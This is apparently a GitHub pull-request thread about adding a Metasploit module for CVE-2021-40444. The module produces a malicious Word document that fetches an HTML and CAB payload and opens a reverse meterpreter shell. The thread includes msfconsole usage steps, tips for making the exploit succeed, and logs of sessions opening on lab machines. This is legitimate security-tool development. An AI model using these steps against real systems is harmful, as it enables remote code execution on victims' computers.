Added module for CVE-2021-40444

[thesunRider]

This PR is for CVE-2021-40444 , module can be used for generating malicious docx files when run on vulnerable MS Word will spawn reverse shells. This was developed on demand from #15694

The exploit doesn't seem to work on pirated versions of the targeted software.

Verification

• Start msfconsole
• use exploit/windows/fileformat/office_word_docx
• Configure options
• run

Updates including sending additional files once the payload connects back will be shown as debug output

##Running the module
You can use the module like this:

 use exploit/windows/fileformat/office_word_docx
 set lhost <>
 set SRVHOST <>
 set SRVPORT <>
 run

Copy the payload.docx to target machine and run it, if everything goes well you should see a meterpreter poping up :-)

[bwatters-r7]

Nice! I was afraid we'd need to use a local binary to do this....

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[thesunRider]

Is it possible to give hacktoberfest label for this pull?

[void-in]

The debug_script.rc file should be removed from the PR. I believe this is your debug script for testing.

[88JC]

PR ini untuk CVE-2021-40444 , modul dapat digunakan untuk menghasilkan file docx berbahaya ketika dijalankan pada MS Word yang rentan akan menelurkan cangkang terbalik. Ini dikembangkan sesuai permintaan dari #15694

Eksploitasi tampaknya tidak berfungsi pada versi bajakan dari perangkat lunak yang ditargetkan.

Verifikasi

• Awal msfconsole
• use exploit/windows/fileformat/office_word_docx
• Konfigurasikan options
• Lari

Pembaruan termasuk mengirim file tambahan setelah payload terhubung kembali akan ditampilkan sebagai output debug

##Menjalankan modul Anda dapat menggunakan modul seperti ini:

 use exploit/windows/fileformat/office_word_docx
 set lhost <>
 set SRVHOST <>
 set SRVPORT <>
 run

Salin payload.docx ke mesin target dan jalankan, jika semuanya berjalan dengan baik, Anda akan melihat meterpreter muncul :-)

why is it not in my metasploit?

[mekhalleh]

Hello @thesunRider, @bwatters-r7, @smcintyre-r7

I made a lot of modifications based on this module logic (exploit using cab file)

• Improve cab file generation (http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf)
• Add cab file block checksum calculation (without this, the operation does not work)
• Modify dll payload mixed_mode
• Use DOCX file as template
• Use custom DOCX file (need create this manually)
• Use custom DLL
• Add JS obfuscation

As this has not changed for 1 month, can I join this PR to add this?

[bwatters-r7]

Hey @thesunRider and @mekhalleh! Sorry this has been sitting for a bit. I've had some other things crop up as priorities, but absolutely, @mekhalleh please feel free to PR to this branch. I'm happy to check it out and work with you all on integration and landing next week, as this is going to be my priority next week again, so thanks everyone for their patience!

[mekhalleh]

I thought I could attach myself to this PR but obviously not. sorry in advance, this created another PR...

-> #15848

[mekhalleh]

It's done. I've add PR on.

[mekhalleh]

FWIW, I'm not getting a session.... I need to figure out why:

@bwatters-r7 have you licenced your microsoft office ? This doesn't work on unlicensed version.

Else must is share with me the files generated by the exploit.

exemple :

• http://192.168.135.197:8080/BvjQtqoo5C.html
• http://192.168.135.197:8080/BvjQtqoo5C.cab
• and the docx

EDIT: And DON'T run the docx from a shared folder... copy the docx on the local disk.

[mekhalleh]

I'll collect the rules of use here:

• This exploit doesn't work on unlicensed Microsoft Office version. Licenced Windows is NOT necessary (Microsoft Office only)
• DON'T run the docx from a shared folder, copy the docx on the local disk.
• When you take a session, you must kill the active session before re take the exploit again.
• Oh, the cab file is taken into the IE cache if it has already been downloaded, keeping the dynamic name for testing is a good idea.

[bwatters-r7]

Odd.... I tried a half-dozen different things, then out of frustration, I reset my VM and immediately got a session.....

msf6 exploit(windows/fileformat/word_mshtml_rce) > show options

Module options (exploit/windows/fileformat/word_mshtml_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
   FILENAME        msf.docx         no        The file name.
   OBFUSCATE       true             yes       Obfuscate JavaScript content.
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the loca
                                              l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf6 exploit(windows/fileformat/word_mshtml_rce) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(windows/fileformat/word_mshtml_rce) > set srvhost 10.5.135.101
srvhost => 10.5.135.101
msf6 exploit(windows/fileformat/word_mshtml_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf6 exploit(windows/fileformat/word_mshtml_rce) > [*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Using URL: http://10.5.135.101:8080/2kLQmLIYt
[*] Server started.
[*] CVE-2021-40444: Generate a malicious docx file
[*] Using template '/home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2021-40444.docx'
[*] Injecting payload in docx document
[*] Finalizing docx 'msf.docx'
[+] msf.docx stored at /home/tmoose/.msf4/local/msf.docx
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] Sending stage (200262 bytes) to 10.5.132.101
[*] Meterpreter session 1 opened (10.5.135.101:4444 -> 10.5.132.101:50994) at 2021-11-16 10:41:50 -0600

msf6 exploit(windows/fileformat/word_mshtml_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > exit

[bwatters-r7]

Hi there! Sorry this took so long to get to!
I have a couple thoughts: First, there's a lot of code duplication between the auxiliary and exploit modules. The easiest solution might be to rework the exploit module so that the auxiliary module is no longer needed, but if we need to keep both, we should move the methods to a shared library based on the reusability of the code. Offhand, I think that the cab creation method could be used by others and should get located in the rex-zip library, but the others are less likely to be reused and I'm not entirely sure where those should live if we decide to keep both modules. Possibly lib/msf/core/util/?

[bwatters-r7]

Yeah; I'm liking the idea of combining the auxiliary and exploit modules into a single exploit module. You can use the payload of your choice by specifying set payload generic/custom and you can enable/disable the httpserver and the handler based on the target type. Maybe have a hosted target and an unhosted target?
To prevent the handler, you could add 'DisablePayloadHandler => Truein the default options for the unhosted target. Seemodules/exploits/freebsd/webapps/spamtitain_unauth_rce` for an example of changing default options based on target data.

[bwatters-r7]

Hrm...... let me see if I can knock out those changes in a PR..... give me a bit.

[bwatters-r7]

Still trying to figure out the best way to toggle that HTTP server....

[mekhalleh]

Still trying to figure out the best way to toggle that HTTP server....

Initially, I had done only one module. Come to think of it I split this because I didn't figure out how to disable the web server.

[bwatters-r7]

I was able to successfully do a HTTP server toggle by overwriting the exploit method: thesunRider#2
It is not perfect, but it does work. I'm still not sure why it says the exploit failed, but then proceeds to work. It might have something to do with exiting the exploit method before bumping up to the super's exploit method.

[mekhalleh]

hello @thesunRider, can you merge the PR from @bwatters-r7 pls ?

[mekhalleh]

Thank you very much @thesunRider , i'm very busy again this week but i will try to finish the job:

• Remove old auxiliary module and its doc
• Modif the doc for the RCE module before merge it
• Last check, ...

The next commit should be the last one before merging this.

[bwatters-r7]

Hey @thesunRider and @mekhalleh! I wanted to let you know that this is a holiday week in the US so I won't be doing much work on this until Monday, but if you are OK with all the changes suggested, I can do the cleanup, module removal, module doc change, and retest next week while I'm landing it to save some time for you both. Because I made some changes, I need to get another committer to OK them, but I can take care of that, too, and that would not happen until next week, either. If you are both OK with the changes on removing the aux module and updating the docs, I can take care of it all next week.
I appreciate the time you spent on this, so I'm happy to do the last little bit of polish landing it if you are busy.

[thesunRider]

I am having a bit of rush with my schedules, I will try to do @mekhalleh task list if time comes by

Happy holidays @bwatters-r7

[mekhalleh]

Yes it is a good idea @bwatters-r7, I did not dare to suggest it to you ...

It's OK for me, I'll let you make the changes. As always, I am delighted to contribute to, it's a real pleasure.

Thanks a lot @thesunRider 👯

And have a good holiday ;)

[smcintyre-r7]

It's not necessary to pass in 1.2.3.4. The function provides a default public address already.

[smcintyre-r7]

If we're going to print the target here, can we make it a little more descriptive so it doesn't look like debug output?

[bwatters-r7]

I've pulled a cleaner set of javascript and incorporated it, but I'm now getting an odd problem where I get code execution, but the session fails to establish.
I know I'm getting code execution because if I switch to a pingback payload, I can catch the UUID in transit with wireshark, but it does not appear to process the callback at all. I get the same results with the original codebase and a snapshot that was working two weeks ago...
More digging is required.

msf6 exploit(windows/fileformat/word_mshtml_rce) > [*] Local IP: http://10.5.135.101:8080/qachy7ovfeULB7C
[*] Server started.
[*] CVE-2021-40444: Generate a malicious docx file
[*] Using template '/home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2021-40444.docx'
[*] Parsing item from template: [Content_Types].xml
[*] Parsing item from template: _rels/
[*] Parsing item from template: _rels/.rels
[*] Parsing item from template: docProps/
[*] Parsing item from template: docProps/core.xml
[*] Parsing item from template: docProps/app.xml
[*] Parsing item from template: word/
[*] Parsing item from template: word/theme/
[*] Parsing item from template: word/theme/theme1.xml
[*] Parsing item from template: word/styles.xml
[*] Parsing item from template: word/settings.xml
[*] Parsing item from template: word/document.xml
[*] Parsing item from template: word/_rels/
[*] Parsing item from template: word/_rels/document.xml.rels
[*] Parsing item from template: word/fontTable.xml
[*] Parsing item from template: word/webSettings.xml
[*] Injecting payload in docx document
[*] Finalizing docx 'msf.docx'
[+] msf.docx stored at /home/tmoose/.msf4/local/msf.docx
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 483e09a1
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 7e6fb805
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 483e09a1
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 7e6fb805
[*] Sending stage (200262 bytes) to 10.5.132.101

[bwatters-r7]

For what it is worth, I'm still working on this. I've discovered that somehow, we have managed to create a strange handler state.
Right now, if I had to guess, we're creating a 'ghost' handler that is isolated somehow from the OS, then creating a second handler... It may be a race condition to see which handler handles? I'm still a bit confused what is happening under the hood...
You can see how this is messed up by setting DisablePayloadHandler to true, then running the exploit a couple times. Despite not asking for a handler, we get one... for each run, all on the same port/IP, which should not be possible. What's more fun is that they are in no way connected to any listening sockets as far as the OS knows:

[bwatters-r7]

On at least three occasions I thought I figured this out. I've been unable to obtain results consistently, though.
I was able to watch a session get created, but not registered in the console- I watched the keep-alive messages go across an established TCP connection, but I can't reproduce it with any confidence. I can see and reproduce the ghost connections I thought were to blame before, but they are just sort of imaginary listeners that don't seem to affect anything, and I don't even think they are limited to this module.
There was a period that resetting DisablePayloadHandler` or resetting the target (which resets DisablePayloadHandler) seemed to mitigate all issues, but then I was able to get repeated sessions without resetting it. I've been able to get repeatable sessions mostly through just running it over and over again now. Doubtless this seems flaky- faling on 1-2 attempts out of 5, but the result is not problematic and you can rerun it again. I'm trying to determine if there's a temporal limit to how frequently I can run it, but it would be a matter of seconds if it were, and that's not feasibly useful.
The listener is not killed after the connection, but that's not a big deal. I can just kill it and rerun without much of an issue. I have not been able to recreate the issue where I get a session hidden from msfconsole, so I can't troubleshoot it.
I've bisected the commits and there's just no consistent behavior. It seems flakier after I combined the modules, but I simply cannot get a definitive answer.
I'm going to start re-adding some of the changes @smcintyre-r7 suggested and just cautiously move forward. I wish I had at least more consistent results, but sometimes exploits are just weird and finite state machines are not as finite as we'd like.

[bwatters-r7]

Huh..... OK. I think I see how I did this, now.
When I re-added the deofuscated js, it all came back. I have now pinned this odd behavior down to including Msf::Post::File, which I used to get access to exploit_data to pull the js from a data file. It apparently comes with other baggage, as I can now reliably get the odd Handler behavior by adding/removing Msf::Post::File

[bwatters-r7]

Retest

       =[ metasploit v6.1.9-dev-852230c739                ]
+ -- --=[ 2168 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the resource command to run 
commands from a file

msf6 exploit(windows/fileformat/word_mshtml_rce) > set target 0
target => 0
msf6 exploit(windows/fileformat/word_mshtml_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/fileformat/word_mshtml_rce) > 
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Using URL: http://0.0.0.0:8080/ENjTanm
[*] Local IP: http://10.5.135.101:8080/ENjTanm
[*] Server started.
[*] CVE-2021-40444: Generate a malicious docx file
[*] Using template '/home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2021-40444.docx'
[*] Injecting payload in docx document
[*] Finalizing docx 'msf.docx'
[+] msf.docx stored at /home/tmoose/.msf4/local/msf.docx
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] Sending stage (200262 bytes) to 10.5.132.101
[*] Meterpreter session 1 opened (10.5.135.101:4444 -> 10.5.132.101:51075) at 2021-12-08 11:27:41 -0600

msf6 exploit(windows/fileformat/word_mshtml_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > 

[smcintyre-r7]

Release Notes

This adds an exploit for CVE-2021-40444 which is a vulnerability that affects Microsoft Word. Successful exploitation results in code execution in the context of the user running Microsoft Word.